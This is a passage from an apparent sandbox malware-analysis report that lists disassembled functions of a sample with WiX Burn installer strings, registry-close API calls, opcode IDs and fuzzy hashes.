                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$FreeVariant$AllocClearInit
                                                                                                                                                                                                                                                                            • String ID: Failed to get value from attribute.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3379191133-973041108
                                                                                                                                                                                                                                                                            • Opcode ID: bfe728a41288ab9328ee57f524ca36d8b78e865879ac45fdd0f57b9c5795498e
                                                                                                                                                                                                                                                                            • Instruction ID: 97fa6863fb9accefa047ff2fcb62deb5dc8d485957a3ff358919b610ee9ea4c0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfe728a41288ab9328ee57f524ca36d8b78e865879ac45fdd0f57b9c5795498e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82F0C272A41218BBDF12AF80CC07F9E7A69EF80755F004050FA00AA1D0D7B68F20EB91
                                                                                                                                                                                                                                                                            Function 008F9187 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,008E6DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00902F8D,008E6DA2,00000001,00000001), ref: 008F997D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 008F90F5
                                                                                                                                                                                                                                                                            • Failed to write %ls value., xrefs: 008F9188
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to write %ls value.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-2586049171
                                                                                                                                                                                                                                                                            • Opcode ID: 222ba02099da46d92523d928297cf6204082614e3ab400bb8830a9a91bb430e4
                                                                                                                                                                                                                                                                            • Instruction ID: 8e250a940501c1ce914f93fd52306a82e2030b9487299fdd8feecf4658f9f4a8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 222ba02099da46d92523d928297cf6204082614e3ab400bb8830a9a91bb430e4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7E06530B04208A6DB11AAA5BC0BFBEBA61FB8570DF10011AF652B01D199E54655DA52
                                                                                                                                                                                                                                                                            Function 008F91B9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,008E6DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00902F8D,008E6DA2,00000001,00000001), ref: 008F997D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 008F90F5
                                                                                                                                                                                                                                                                            • Failed to write %ls value., xrefs: 008F91BA
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to write %ls value.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-2586049171
                                                                                                                                                                                                                                                                            • Opcode ID: 175d4483f40818a2f34fd0772c5d8084ad97772f29a1d1faea5012097eb15993
                                                                                                                                                                                                                                                                            • Instruction ID: 4071309aae93839a0422ffc13aa77d1885e48573d5e9d2ced77640fe73d74f92
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 175d4483f40818a2f34fd0772c5d8084ad97772f29a1d1faea5012097eb15993
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5DE06530B04209A6DB11AAA5BC0BFBEBE61FB8570DF10011AF652A01D199B54655DA52
                                                                                                                                                                                                                                                                            Function 008F9158 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,008E6DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00902F8D,008E6DA2,00000001,00000001), ref: 008F997D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 008F90F5
                                                                                                                                                                                                                                                                            • Failed to write %ls value., xrefs: 008F9159
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to write %ls value.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-2586049171
                                                                                                                                                                                                                                                                            • Opcode ID: 9af762e849fa0bda52ab214233c567cbc7d99c81632d4956bb27d144eb73a08b
                                                                                                                                                                                                                                                                            • Instruction ID: 154518fe0b1d6dcd9b028614c28d600ab3d68db749447c675fd3727570cfb689
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9af762e849fa0bda52ab214233c567cbc7d99c81632d4956bb27d144eb73a08b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6DE06530B04208A6DF11AAA5FC0BFBEBA61FB8570DF11015AF652A01D199A54654DA52
                                                                                                                                                                                                                                                                            Function 008F93EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,008E6DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00902F8D,008E6DA2,00000001,00000001), ref: 008F997D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to update name and publisher., xrefs: 008F93EF
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 008F9959
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                            • String ID: Failed to update name and publisher.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3535843008-1652864479
                                                                                                                                                                                                                                                                            • Opcode ID: c3b24e7db9101739ff3419b20173fda542f64f16fad94e6d7185177a0ed5e1d8
                                                                                                                                                                                                                                                                            • Instruction ID: 381361954415bcf09ea1a8030a9da93d445287c812e4e02e9eb79d1fc878f9bb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3b24e7db9101739ff3419b20173fda542f64f16fad94e6d7185177a0ed5e1d8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DAE09230B04309A7DB11EAA5FC0BFBEBB61FB8170EF10011AF742E01D18AF44A54DA82